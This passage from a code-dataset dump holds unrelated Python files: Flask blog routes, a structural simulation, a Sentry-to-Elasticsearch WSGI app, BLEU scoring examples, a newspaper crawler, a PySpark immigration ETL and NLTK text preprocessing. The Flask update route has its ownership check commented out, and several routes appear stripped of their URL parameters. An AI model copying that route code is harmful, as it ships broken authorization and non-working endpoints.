Like\nfrom app.models import db\n\n\nstory_routes = Blueprint('stories', __name__)\n\n\n# Get all the story route\n@story_routes.route('/')\ndef stories():\n # stories = Story.query.all()\n stories = Story.query.order_by(Story.id.desc()).limit(6)\n return {'stories': [story.to_dict() for story in stories]}\n\n\n# Get one story route with author and associated comments, likes\n@story_routes.route('/')\ndef one_story(id):\n story = Story.query.get(id)\n author = User.query.join(Story, User.id == Story.author_id).filter(Story.id == id)\n comments = Comment.query.join(Story, Comment.story_id == Story.id ).filter(Story.id == id)\n count_likes = sum([like.count for like in story.likes])\n \n return {\n 'author': [s.to_dict() for s in author],\n \"story\" : [story.to_dict()],\n 'comments': [comment.to_dict() for comment in comments],\n \"total_likes\": count_likes\n }\n\n\n# Post a story route\n@story_routes.route('', methods=['POST'])\ndef add_story():\n title = request.json['title']\n body = request.json['body']\n author_id = User.query.filter_by(username = request.json['author']).first().id\n \n new_story = Story(title, body, author_id)\n \n db.session.add(new_story)\n db.session.commit()\n \n return {\"id\": new_story.id}\n\n\n# Update a story route\n@story_routes.route('/', methods=[\"PUT\"])\n@login_required\ndef update_story(id):\n story = Story.query.get(id)\n # if current_user.get_id() != story.author_id:\n # return jsonify('not authorized!')\n new_title = request.json['title']\n new_body = request.json['body']\n story.title = new_title\n story.body = new_body\n db.session.add(story)\n db.session.commit()\n return story.to_dict()\n\n\n# Delete a story route\n@story_routes.route('/', methods=['DELETE'])\n@login_required\ndef delete_story(id):\n story = Story.query.get(id)\n if not story:\n return jsonify('story not found')\n db.session.delete(story)\n db.session.commit()\n return jsonify('deleted')\n\n\n# Get all the stories written by a single user\n@story_routes.route('/user/')\ndef user_stories():\n stories_by_user = Story.query.all()\n return {'stories': [story.to_dict() for story in stories_by_user]}\n\n\n# Post a comment Route\n@story_routes.route('//comment', methods=['POST'])\ndef post_comment(id):\n story_id = Story.query.get(id).id\n user_id = User.query.filter_by(username = request.json['author']).first().id\n comment = request.json['comment']\n \n new_comment = Comment(user_id, story_id, comment)\n db.session.add(new_comment)\n db.session.commit()\n\n return new_comment.to_dict()\n\n\n# Post a like\n@story_routes.route('//like', methods=['POST'])\ndef post_like(id):\n story_id = Story.query.get(id).id\n user_id = User.query.filter_by(username = request.json['user']).first().id\n like = Like.query.filter(Like.story_id == id).filter(Like.user_id == user_id).first()\n # count = 1\n if like:\n like.count = like.count + 1\n db.session.add(like)\n db.session.commit()\n return like.to_dict()\n else:\n new_like = Like(user_id, story_id, count=1)\n db.session.add(new_like)\n db.session.commit()\n return new_like.to_dict()\n","sub_path":"app/api/story_routes.py","file_name":"story_routes.py","file_ext":"py","file_size_in_byte":3427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"504942110","text":"from compas.numerical import drx_numba\nfrom compas.datastructures import Network\nfrom compas_viewers.vtkviewer import VtkViewer\n\nm = 150\np = [(i / m - 0.5) * 5 for i in range(m + 1)]\nnodes = [[xi, yi, 0] for yi in p for xi in p]\nedges = []\n\nfor i in range(m):\n for j in range(m):\n\n s = (m + 1)\n p1 = (j + 0) * s + i + 0\n p2 = (j + 0) * s + i + 1\n p3 = (j + 1) * s + i + 0\n p4 = (j + 1) * s + i + 1\n\n edges.append([p1, p2])\n edges.append([p1, p3])\n\n if j == m - 1:\n edges.append([p4, p3])\n\n if i == m - 1:\n edges.append([p2, p4])\n\nnetwork = Network.from_nodes_and_edges(nodes, edges)\nsides = [i for i in network.nodes() if network.degree(i) <= 2]\nnetwork.update_default_node_attributes({'P': [0, 0, 1000 / network.number_of_nodes()]})\nnetwork.update_default_edge_attributes({'E': 100, 'A': 1, 'ct': 't'})\nnetwork.nodes_attributes(keys=sides, names='B', values=[[0, 0, 0]])\n\ndrx_numba(network=network, tol=0.01, summary=1, update=1)\n\ndata = {\n 'nodes': [network.node_coordinates(i) for i in network.nodes()],\n 'edges': [{'nodes': uv} for uv in network.edges()]\n}\n\nviewer = VtkViewer(data=data)\n# viewer.node_size = 0\nviewer.setup()\nviewer.start()\n","sub_path":"__temp/fofin-structures/fofin-dense-numba.py","file_name":"fofin-dense-numba.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"236121076","text":"__author__ = 'Pontus'\nimport numpy as np\n\ndef gram(docs1, docs2, kernel):\n g = []\n for d1 in docs2:\n g2 = []\n for d2 in docs1:\n g2.append(kernel(d1,d2))\n g.append(np.array(g2))\n return np.array(g)","sub_path":"kernels/gram.py","file_name":"gram.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"506883406","text":"from queue import Queue\nfrom threading import Thread\n\nfrom elasticsearch_raven import configuration\nfrom elasticsearch_raven.transport import ElasticsearchTransport\nfrom elasticsearch_raven.transport import SentryMessage\n\ntransport = ElasticsearchTransport(configuration.host, configuration.use_ssl)\nblocking_queue = Queue()\n\n\ndef send():\n while True:\n message = blocking_queue.get()\n transport.send(message)\n blocking_queue.task_done()\n\n\nsender = Thread(target=send)\nsender.start()\n\n\ndef application(environ, start_response):\n length = int(environ.get('CONTENT_LENGTH', '0'))\n data = environ['wsgi.input'].read(length)\n blocking_queue.put(SentryMessage.create_from_http(\n environ['HTTP_X_SENTRY_AUTH'], data))\n\n status = '200 OK'\n response_headers = [('Content-Type', 'text/plain')]\n start_response(status, response_headers)\n return [''.encode('utf-8')]\n","sub_path":"elasticsearch_raven/wsgi.py","file_name":"wsgi.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"652001548","text":"import random\n\ni = 0\n\nxnum =random.randint(0,9)\n\nwhile i < 5:\n\tprint('****************')\n\tnum = int(input(\"Please in put a number between 1 to 10\\n\"))\n\n\tx = 3 - i\n\n\tif num == xnum:\n\t\tprint(\"Yes Guess Right\")\n\t\tbreak\n\telif num > xnum:\n\t\tprint(\"Bigger than Random,chance Only %d \" %x)\n\telif num < xnum:\n\t\tprint(\"Small than Randon ,chance Only %d \" %x)\n\n\ti +=1","sub_path":"python3/training/猜字游戏_三次随机数一样.py","file_name":"猜字游戏_三次随机数一样.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"74521885","text":"'''\r\nAuthor: Luke Hebert\r\nDate begun: February 20th, 2021?\r\nDescription:\r\n\ttake expression profile results (log-fold change data from experiments)\r\n\t\tand {transcripts:genenames} pickled dictionary\r\n\t\tand more raw .csv files that include padj values\r\n\tcreate variations of bar graphs to depict data\r\n\toutput each graph version style in a separate folder\r\n'''\r\n\r\n#import necessary libraries\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\nimport sys, os, pickle\r\n\r\n#assign a slash symbol based on the current machine's operating system\r\nslash = '\\\\' if os.name == 'nt' else '/'\r\n#store input file pathway and also save input folder\r\nin_folder_path = sys.argv[1]\r\nin_files_list = []\r\nfor root,dirs,files in os.walk(in_folder_path):\r\n\tin_files_list.extend(files)\r\n\tbreak\r\n\r\n#load the pickled dictionary of {'transcripts':'genenames'}\r\nfor file_name in in_files_list:\r\n\tif '.pkl' in file_name:\r\n\t\tgene_dict = pickle.load(open(file_name,\"rb\"))\r\n\r\n\r\n#load adjusted p values from the \"padj\" files, filtered by padj .05 & log2fold 2/-2\r\npadj_dict = {}\r\nfor file_name in in_files_list:\r\n\tif 'padj' in file_name:\r\n\t\twith open(in_folder_path+slash+file_name) as in_file:\r\n\t\t\tfor i,line in enumerate(in_file):\r\n\t\t\t\tline_list = line.replace('\\r','').replace('\\n','').split('\\t')\r\n\t\t\t\tif i == 0:\r\n\t\t\t\t\tpass\r\n\t\t\t\telif line_list[2]!='NA' and line_list[6]!='NA':\r\n\t\t\t\t\ttranscript = line_list[0].replace('\\\"','').replace(',',';')\r\n\t\t\t\t\tlog2fold = float(line_list[2])\r\n\t\t\t\t\tpadj = float(line_list[6])\r\n\t\t\t\t\t#line_list2 is the logbase2foldchange & line_list6 is adjusted p value\r\n\t\t\t\t\tif (log2fold >= 2 or log2fold <= -2) and padj < 0.05:\r\n\t\t\t\t\t\tpadj_dict[gene_dict[transcript]]=padj\r\n\r\n\r\n#read in logfold2 data to a dictionary for making graphs\r\nout_dict = {}\r\nfor file_name in in_files_list:\r\n\tif 'Fig' in file_name:\r\n\t\tout_dict[file_name[:-4]] = {'gene':[],'log2float':[],'label':[], 'padj':[]}\r\n\t\twith open(in_folder_path+slash+file_name) as in_file:\r\n\t\t\tfor line in in_file:\r\n\t\t\t\tline_list = line.replace('\\r','').replace('\\n','').split(',')\r\n\t\t\t\tout_dict[file_name[:-4]]['gene'].append('$\\it{'+line_list[0]+'}$')\r\n\t\t\t\tout_dict[file_name[:-4]]['log2float'].append(float(line_list[1]))\r\n\t\t\t\tout_dict[file_name[:-4]]['label'].append(line_list[2].replace('WNT','$\\it{WNT}$'))\r\n\t\t\t\tout_dict[file_name[:-4]]['padj'].append(\"{:.2e}\".format( float(padj_dict[line_list[0]]) ))\r\n\t\t\t\t\t#formatting tip from here: https://stackoverflow.com/questions/6913532/display-a-decimal-in-scientific-notation\r\n\r\n\r\n\r\n#for each input file, cycle through the dictionary and call the graphing function for each item (and output)\r\nfor graph in out_dict:\r\n\r\n\t'''\r\n\t#sort the graphing dictionary by foldchange\r\n\tzipped_list = list( zip(out_dict[graph]['gene'], out_dict[graph]['log2float'], out_dict[graph]['label'], out_dict[graph]['padj']) )\r\n\tzipped_list.sort(key=lambda x:x[1]) #sort based on log2float\r\n\tout_dict[graph]['gene'] = [x for x, this, that, other in zipped_list]\r\n\tout_dict[graph]['label'] = [x for this, that, x, other in zipped_list]\r\n\tout_dict[graph]['padj'] = [x for this, that, other, x in zipped_list]\r\n\t'''\r\n\r\n\tout_folder=in_folder_path+slash+graph+slash\r\n\tif not os.path.exists(out_folder):\r\n\t\tos.makedirs(out_folder)\r\n\t\tprint('\\nOutputting:\\t' + str(out_folder))###\r\n\telse:\r\n\t\tprint('This folder already exists and was therefore not overwritten: '+out_folder)\r\n\r\n\r\n\t#make a list of all combination tuples, which will be iterated over to create\r\n\t\t#graphs of varying properties; tuples should be of the format:\r\n\t\t#(gridcolor, palette name, orientation, dodge boolean)\r\n\tgraph_versions = (\r\n\t('darkgrid','Accent','h',False),\r\n\t('darkgrid','Set1_r','h',False),\r\n\t('darkgrid','Set3','h',False),\r\n\t('darkgrid','colorblind','h',False),\r\n\t('darkgrid','pastel','h',False)\r\n\t)\r\n\t#loop through all graph version combinations\r\n\t\t#create, save, and clear the figure for each version\r\n\tfor details_tup in graph_versions:\r\n\t\tgridcolor, palette_name, orientation, dodge_bool = details_tup\r\n\t\tif len(set(out_dict[graph]['gene']))>25:\r\n\t\t\tplt.figure(figsize=(8,10))\r\n\t\tsns.set_theme(style=gridcolor,palette=palette_name)\r\n\t\t#avoid repeat y axis value issue by manually setting y tick labels and\r\n\t\t\t#using the indexes of x values for y values (stored in range_list)\r\n\t\trange_list=[]\r\n\t\tfor i,item in enumerate(out_dict[graph]['log2float']):\r\n\t\t\trange_list.append(i)\r\n\t\tax=sns.barplot(x=out_dict[graph]['log2float'],\r\n\t\t\t\t\t\ty=range_list,\r\n\t\t\t\t\t\tdodge=dodge_bool,#avoid tiny bar widths\r\n\t\t\t\t\t\thue=out_dict[graph]['label'],\r\n\t\t\t\t\t\torient=orientation)\r\n\t\tax.set_yticklabels(out_dict[graph]['gene'])\r\n\t\t#add padj values near the bars\r\n\t\tfor i in range(len(out_dict[graph]['gene'])):\r\n\t\t\tif out_dict[graph]['log2float'][i] > 0:\r\n\t\t\t\thoriz_adj = 'left'\r\n\t\t\telse:\r\n\t\t\t\thoriz_adj = 'right'\r\n\r\n\t\t\tax.text(out_dict[graph]['log2float'][i], i+0.25, str(out_dict[graph]['padj'][i]),\r\n\t\t\t\t\tfontdict=dict(color='red',fontsize=6),\r\n\t\t\t\t\tha=horiz_adj, va='baseline')\r\n\t\t#add gene names inside the bars\r\n\t\tfor i in range(len(out_dict[graph]['gene'])):\r\n\t\t\tax.text(out_dict[graph]['log2float'][i]/2, i+0.25, str(out_dict[graph]['gene'][i]),\r\n\t\t\t\t\tfontdict=dict(color='black',fontsize=6),\r\n\t\t\t\t\tha='center', va='baseline')\r\n\t\tax.figure.savefig(''.join([out_folder,slash,graph,'_',orientation,'_',gridcolor[0:4],'_',palette_name,'.png']),dpi=800)\r\n\t\tplt.close() #clear the current figure to make room for next one\r\n\r\n\r\n#keeping this code below in case I ever need to switch back to \"vertical\" barplot orientation\r\n'''\r\n\t#horizontal, light =========================================================\r\n\tif len(set(out_dict[graph]['gene']))>25:\r\n\t\tplt.figure(figsize=(8,5))\r\n\tsns.set_theme(style=\"whitegrid\",palette='colorblind')\r\n\tax=sns.barplot(x=out_dict[graph]['gene'],\r\n\t\t\t\t\ty=out_dict[graph]['log2float'],\r\n\t\t\t\t\tdodge=boolboi,#avoid tiny bar widths\r\n\t\t\t\t\thue=out_dict[graph]['label'],\r\n\t\t\t\t\torient='v')\r\n\tif len(set(out_dict[graph]['gene']))>25:\r\n\t\tplt.setp(ax.get_xticklabels(), rotation=-45)\r\n\telse:\r\n\t\tplt.setp(ax.get_xticklabels(), rotation=-30)\r\n\tax.figure.savefig(''.join([out_folder,slash,graph,'_v','_light.png']),dpi=800)\r\n\tplt.close() #clear the current figure to make room for next one\r\n'''\r\n","sub_path":"createExpressionGraphs_20210307A.py","file_name":"createExpressionGraphs_20210307A.py","file_ext":"py","file_size_in_byte":6156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"50597053","text":"#!/usr/bin/python3\n# coding: utf-8\nfrom nltk.translate.bleu_score import sentence_bleu\nfrom nltk.translate.bleu_score import corpus_bleu\n\n##################################################################\n## 一: sentence_bleu: Calculate BLEU score (Bilingual Evaluation Understudy)\n# sentence_bleu(references, hypothesis, weights=(0.25, 0.25, 0.25, 0.25), smoothing_function=None, auto_reweigh=False, emulate_multibleu=False)\n# 参考语句必须作为语句列表来提供, 其中每个语句是一个记号列表, 候选语句作为一个记号列表被提供\nreference = [['this', 'is', 'a', 'test'], ['this', 'is' 'test']]\ncandidate = ['this', 'is', 'a', 'test']\nscore = sentence_bleu(reference, candidate)\nprint(score) # 会输出一个满分, 因为候选语句完全匹配其中一个参考语句\n\nreference = [['the', 'cat', \"is\", \"sitting\", \"on\", \"the\", \"mat\"]]\ntest = [\"on\", 'the', \"mat\", \"is\", \"a\", \"cat\"] # The hypothesis contains 0 counts of 4-gram overlaps.\nprint(sentence_bleu(reference, test)) # 5.5546715329196825e-78\ntest = ['the', 'cat', 'is', 'sitting', 'on', 'mat']\nprint(sentence_bleu(reference, test)) # 0.6731821382417487\n\n##################################################################\n## 二: corpus_bleu: 计算多个句子(如段落或文档)的 BLEU 分数\n# 参考文本必须被指定为文档列表, 其中每个文档是一个参考语句列表, 并且每个可替换的参考语句也是记号列表, 也就是说文档列表是记号列表的列表的列表\n# 候选文档必须被指定为列表, 其中每个文件是一个记号列表, 也就是说候选文档是记号列表的列表\n\nreferences = [[['this', 'is', 'a', 'test'], ['this', 'is' 'test']]] # two references for one document\ncandidates = [['this', 'is', 'a', 'test']]\nscore = corpus_bleu(references, candidates)\nprint(score) # 1.0; 运行这个例子就像之前一样输出满分\n\n##################################################################\n## 累加和单独的 BLEU 分数\n# NLTK 中提供的 BLEU 评分方法允许你在计算 BLEU 分数时为不同的 n 元组指定权重\n# 这使你可以灵活地计算不同类型的 BLEU 分数, 如单独和累加的 n-gram 分数\n\n## 单独的 N-Gram 分数\n# 单独的 N-gram 分数是对特定顺序的匹配 n 元组的评分, 例如单个单词(称为 1-gram)或单词对(称为 2-gram 或 bigram)\n# 权重被指定为一个数组, 其中每个索引对应相应次序的 n 元组\n# 仅要计算 1-gram 匹配的 BLEU 分数, 你可以指定 1-gram 权重为 1, 对于 2 元, 3 元和 4 元指定权重为 0, 也就是权重为(1, 0, 0, 0):\n\n## 1-gram individual BLEU\nreference = [['this', 'is', 'small', 'test']]\ncandidate = ['this', 'is', 'a', 'test']\nscore = sentence_bleu(reference, candidate, weights=(1, 0, 0, 0)); print(score) # 0.75\n\n## 我们可以重复这个例子, 对于从 1 元到 4 元的各个 n-gram 运行语句如下所示:\n# n-gram individual BLEU\nreference = [['this', 'is', 'a', 'test']]\ncandidate = ['this', 'is', 'a', 'test']\nprint('Individual 1-gram: %f' % sentence_bleu(reference, candidate, weights=(1, 0, 0, 0))) # 1.000000\nprint('Individual 2-gram: %f' % sentence_bleu(reference, candidate, weights=(0, 1, 0, 0))) # 1.000000\nprint('Individual 3-gram: %f' % sentence_bleu(reference, candidate, weights=(0, 0, 1, 0))) # 1.000000\nprint('Individual 4-gram: %f' % sentence_bleu(reference, candidate, weights=(0, 0, 0, 1))) # 1.000000\n# 虽然我们可以计算出单独的 BLEU 分数, 但这并不是使用这个方法的初衷, 而且得出的分数也没有过多的含义, 或者看起来具有说明性\n\n##################################################################\n## 累加的 N-Gram 分数\n# 累加分数是指对从 1 到 n 的所有单独 n-gram 分数的计算, 通过计算加权几何平均值来对它们进行加权计算\n# 默认情况下, sentence_bleu() 和 corpus_bleu()分数计算累加的 4 元组 BLEU 分数, 也称为 BLEU-4 分数\n# BLEU-4 对 1 元组, 2 元组, 3 元组和 4 元组分数的权重为 1/4(25 %)或 0.25\n\nreference = [['this', 'is', 'small', 'test']]\ncandidate = ['this', 'is', 'a', 'test']\nscore = sentence_bleu(reference, candidate, weights=(0.25, 0.25, 0.25, 0.25)); print(score) # 0.707106781187\nprint()\n\n## cumulative BLEU scores\nreference = [['this', 'is', 'small', 'test']]\ncandidate = ['this', 'is', 'a', 'test']\nprint('Cumulative 1-gram: %f' % sentence_bleu(reference, candidate, weights=(1, 0, 0, 0))) # 0.750000\nprint('Cumulative 2-gram: %f' % sentence_bleu(reference, candidate, weights=(0.5, 0.5, 0, 0))) # 0.500000\nprint('Cumulative 3-gram: %f' % sentence_bleu(reference, candidate, weights=(0.33, 0.33, 0.33, 0))) # 0.632878\nprint('Cumulative 4-gram: %f' % sentence_bleu(reference, candidate, weights=(0.25, 0.25, 0.25, 0.25))) # 0.707107\n# 结果的差别很大, 比单独的 n-gram 分数更具有表达性\n# 在描述文本生成系统的性能时, 通常会报告从 BLEU-1 到 BLEU-4 的累加分数\n\n##################################################################\n## 在这一节中, 我们试图通过一些例子来进一步获取对 BLEU 评分的直觉\n# 我们在语句层次上通过用下面的一条参考句子来说明:\n# the quick brown fox jumped over the lazy dog\n\n## 首先, 我们来看一个完美的分数\n# prefect match\nfrom nltk.translate.bleu_score import sentence_bleu\nreference = [['the', 'quick', 'brown', 'fox', 'jumped', 'over', 'the', 'lazy', 'dog']]\ncandidate = ['the', 'quick', 'brown', 'fox', 'jumped', 'over', 'the', 'lazy', 'dog']\nscore = sentence_bleu(reference, candidate); print(score) # 1.0\n\n# one word different\nreference = [['the', 'quick', 'brown', 'fox', 'jumped', 'over', 'the', 'lazy', 'dog']]\ncandidate = ['the', 'fast', 'brown', 'fox', 'jumped', 'over', 'the', 'lazy', 'dog'] # 把\" quick \"改成\" fast \"\nscore = sentence_bleu(reference, candidate); print(score) # 0.7506238537503395\n\n# two words different\nreference = [['the', 'quick', 'brown', 'fox', 'jumped', 'over', 'the', 'lazy', 'dog']]\ncandidate = ['the', 'fast', 'brown', 'fox', 'jumped', 'over', 'the', 'sleepy', 'dog'] # 把\" quick \"改成\" fast \", 把\" lazy \"改成\" sleepy \"\nscore = sentence_bleu(reference, candidate); print(score) # 0.4854917717073234\n\n# all words different\nreference = [['the', 'quick', 'brown', 'fox', 'jumped', 'over', 'the', 'lazy', 'dog']]\ncandidate = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i']\nscore = sentence_bleu(reference, candidate); print(score) # 0.0\n\n# 现在, 让我们尝试一个比参考语句的词汇更少(例如, 放弃最后两个词)的候选语句, 但这些单词都是正确的\n# shorter candidate\nreference = [['the', 'quick', 'brown', 'fox', 'jumped', 'over', 'the', 'lazy', 'dog']]\ncandidate = ['the', 'quick', 'brown', 'fox', 'jumped', 'over', 'the']\nscore = sentence_bleu(reference, candidate); print(score) # 0.7514772930752859\n# 结果和之前的有两个单词错误的情况很相似\n\n# 如果我们把候选语句调整为比参考语句多两个单词, 那又会怎么样?\n# longer candidate\nreference = [['the', 'quick', 'brown', 'fox', 'jumped', 'over', 'the', 'lazy', 'dog']]\ncandidate = ['the', 'quick', 'brown', 'fox', 'jumped', 'over', 'the', 'lazy', 'dog', 'from', 'space']\nscore = sentence_bleu(reference, candidate); print(score) # 0.7860753021519787\n# 再一次, 我们可以看到, 我们的直觉是成立的, 得分还是有点像 \"有两个错字\" 的情况\n\n# 最后, 我们来比较一个很短的候选语句: 只有两个单词的长度。\n# very short\nreference = [['the', 'quick', 'brown', 'fox', 'jumped', 'over', 'the', 'lazy', 'dog']]\ncandidate = ['the', 'quick']\nscore = sentence_bleu(reference, candidate); print(score) # 0.0301973834223185\n# 运行此示例首先会打印一条警告消息, 指出不能执行评估 3 元组及以上部分(直到 4 元组)。这是合乎情理的, 因为在候选语句中我们最多只能用 2 元组来运行\n","sub_path":"bin/template/src/jptnltk/l28_translate.py","file_name":"l28_translate.py","file_ext":"py","file_size_in_byte":7928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"492661643","text":"import datetime\nfrom bs4 import BeautifulSoup\nimport requests\nimport re\nfrom crawler_content import *\n\ndef get_info_main(url,headers):\n web_data = requests.get(url, headers=headers)\n web_data.encoding = 'utf-8' # 解决乱码问题\n soup = BeautifulSoup(web_data.text, 'lxml')\n # soup = BeautifulSoup(html,'lxml')\n banmian = soup.find_all(id='pageLink')\n\n # 选择理论版块,提取url\n for i in banmian:\n if '理论' in i.text :\n print('banmian: ' + i.text)\n url_temp = i.get('href')\n url_temp = url[0:-6] + url_temp[-6:]\n print('理论版url: ' + url_temp)\n get_info(url_temp, headers)\n\n\n#保存pdf; 调用json_save爬取下层网址并保存json\ndef get_info(url,headers):\n web_data = requests.get(url, headers=headers)\n web_data.encoding = 'utf-8' # 解决乱码问题\n soup = BeautifulSoup(web_data.text, 'lxml')\n\n #获取具体地址,爬取内容并保存json\n urls7 = soup.select('.news > ul > li > a ')\n for s in urls7:\n print(s.get('href'))\n '''\n http://paper.people.com.cn/rmrb/html/2018-08/02/nbs.D110000renmrb_07.htm\n http://paper.people.com.cn/rmrb/html/2018-08/02/nw.D110000renmrb_20180802_1-07.htm\n nw.D110000renmrb_20180802_1-07.htm'''\n s = re.findall('.*\\d\\d/\\d\\d/', url)[0] + s.get('href')\n print(s)\n json_save(s,headers)\n\n#按时间获取url\ndaystart = datetime.datetime.strptime(\"2020-07-01\", \"%Y-%m-%d\").date()\ndaystop = datetime.datetime.strptime(\"2020-07-02\",'%Y-%m-%d').date()\nurls = []\nwhile daystart <= daystop:\n day = daystart.strftime(\"%Y-%m/%d\")\n s = 'http://paper.people.com.cn/rmrb/html/'+day+'/nbs.D110000renmrb_01.htm'\n urls.append(s)\n daystart = daystart + datetime.timedelta(days=1)\n\nheaders = {\n 'User-Agent': 'Windows Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0'\n}\nfor url in urls:\n get_info_main(url,headers)\n ","sub_path":"skl/crawler/rmrb2020-07/crawler_rmrb.py","file_name":"crawler_rmrb.py","file_ext":"py","file_size_in_byte":2024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"209882864","text":"\"\"\"\n crython/log\n ~~~~~~~~~~~\n\n Contains package logger.\n\"\"\"\n# pylint: disable=global-statement\nimport logging\n\nfrom crython import compat\n\n\nROOT_LOGGER = None\n\n\nif compat.py26:\n logging._loggerClass.getChild = lambda s, name: '{0}.{1}'.format(s.name, name) # pylint: disable=protected-access\n\n\ndef get_logger(name=None):\n \"\"\"\n Get a logger instance relative to the crython package.\n \"\"\"\n global ROOT_LOGGER\n\n if ROOT_LOGGER is None:\n ROOT_LOGGER = logging.getLogger()\n\n name = '.'.join((ROOT_LOGGER.name, name)) if name else None\n return logging.getLogger(name)\n","sub_path":"crython/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"341120978","text":"# imports\nimport pyspark.sql.functions as F\nimport pyspark.sql.types as T\nimport datetime\n\n# variables\ns3_bucket = \"s3:///\"\nraw_data_path = \"{}rawdata/\".format(s3_bucket)\nprocessed_data_path = \"{}processed/\".format(s3_bucket)\n\n# user definded functions\n@F.udf(T.TimestampType())\ndef convSasDate(daysCount):\n import datetime\n sas_ref = datetime.datetime(1960,1,1)\n try:\n return sas_ref + datetime.timedelta(days=int(daysCount))\n except:\n return daysCount\n\n\n# splitting immigration data into 2 datasets \n# first one is for immigrants\n# second one is for immigration data\n\n# process immigration data for immigrant\nus_immigrant = spark.read.format('com.github.saurfang.sas.spark')\\\n.load(\"{}i94_immigration/18-83510-I94-Data-2016/i94_{}_sub.sas7bdat\".format(raw_data_path, month_year))\\\n.withColumn(\"gender\", F.when(F.col(\"gender\")==F.lit(\"X\"), F.lit(\"O\")).otherwise(F.col(\"gender\")))\\\n.select(\n F.col(\"cicid\").cast(T.IntegerType()).alias(\"cicid\"),\n F.col(\"i94res\").cast(T.IntegerType()).alias(\"from_country_code\"),\n F.col(\"i94bir\").cast(T.IntegerType()).alias(\"age\"),\n F.col(\"i94visa\").cast(T.IntegerType()).alias(\"visa_code\"),\n F.col(\"visapost\").alias(\"visa_post\"),\n F.col(\"occup\").alias(\"occupation\"),\n F.col(\"visatype\").alias(\"visa_type\"),\n F.col(\"biryear\").cast(T.IntegerType()).alias(\"birth_year\"),\n F.col(\"gender\")\n)\\\n.withColumn(\"monthYear\", F.lit(month_year))\n\n# write\nus_immigrant.write.partitionBy(\"monthYear\").mode(\"append\").parquet('{}immigrant/'.format(processed_data_path))\n\n\n# process immigration data for immigration stats\nus_immigration = spark.read.format('com.github.saurfang.sas.spark')\\\n.load(\"{}i94_immigration/18-83510-I94-Data-2016/i94_{}_sub.sas7bdat\".format(raw_data_path, month_year))\\\n.select(\n F.col(\"cicid\").cast(T.IntegerType()).alias(\"cicid\"),\n F.col(\"admnum\").cast(T.LongType()).alias(\"admnum\"),\n F.col(\"i94port\").alias(\"iata_code\"),\n F.col(\"i94addr\").alias(\"state_code\"),\n \"arrdate\",\"depdate\", \"dtaddto\", \"airline\", \"fltno\", \"entdepa\", \"entdepd\", \"entdepu\", \"matflag\"\n)\\\n.withColumn(\"arrival_date\", convSasDate(\"arrdate\"))\\\n.withColumn(\"departure_date\", convSasDate(\"depdate\"))\\\n.withColumn(\"deadline_departure\", F.unix_timestamp(\"dtaddto\", 'mmddyyyy').cast(T.TimestampType()))\\\n.withColumn(\"monthYear\", F.lit(month_year))\\\n.drop(\"arrdate\", \"depdate\", \"dtaddto\")\n\n# write\nus_immigration.write.partitionBy(\"monthYear\").mode('append').parquet('{}immigration/'.format(processed_data_path))\n\n\n\n\n","sub_path":"dags/transform/build__immigration.py","file_name":"build__immigration.py","file_ext":"py","file_size_in_byte":2501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"261302336","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport pandas as pd\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.feature_extraction.text import TfidfTransformer\n\n\n# !!!!! A Executer la premier fois !!!!!\n#nltk.download('punkt')\n#nltk.download('stopwords')\n\npath_csv = \"Tobacco3482.csv\"\n\ndef etude_des_classes(path_csv):\n df =pd.read_csv(path_csv)\n print(\"Nombres de classes : \", len(df['label'].value_counts()))\n print(\"Nombres d'elements : \", len(df['label']))\n print(\"Echantillons de la structure : \\n\", df.iloc[:3])\n sns.countplot(data=df,y='label', order = df['label'].value_counts().index)\n plt.show()\n \ndef recup_chemin(df):\n chemin_img = df[\"img_path\"]\n chemin_txt = []\n for elem in chemin_img:\n chemin_txt.append(elem.replace('jpg', 'txt'))\n \n return chemin_txt\n\ndef recup_fichier(path_csv,stopmot=False):\n df =pd.read_csv(path_csv)\n chemin_txt = recup_chemin(df)\n list_fichiers = []\n \n if (stopmot==True):\n print(\"Nombre de chemins : \", len(chemin_txt))\n for chemin in chemin_txt:\n with open(\"Tobacco3482-OCR/\"+chemin, 'r') as fichier:\n list_fichiers.append(fichier.read().replace('\\n', ''))\n print(\" doc recup (3482) : \", len(list_fichiers))\n\n \n stop_words = set(stopwords.words('english'))\n list_preprocess = []\n for fichier in list_fichiers:\n preprocess = []\n words = word_tokenize(fichier)\n for mot in words:\n if mot not in stop_words:\n \n preprocess.append(mot)\n str_preprocess = ' '.join(preprocess)# Pour retourner sur une phrase et non une liste\n list_preprocess.append(str_preprocess)\n list_fichiers=list_preprocess\n \n else:\n print(\"Nombre de chemins : \", len(chemin_txt))\n for chemin in chemin_txt:\n with open(\"Tobacco3482-OCR/\"+chemin, 'r') as fichier:\n list_fichiers.append(fichier.read().replace('\\n', 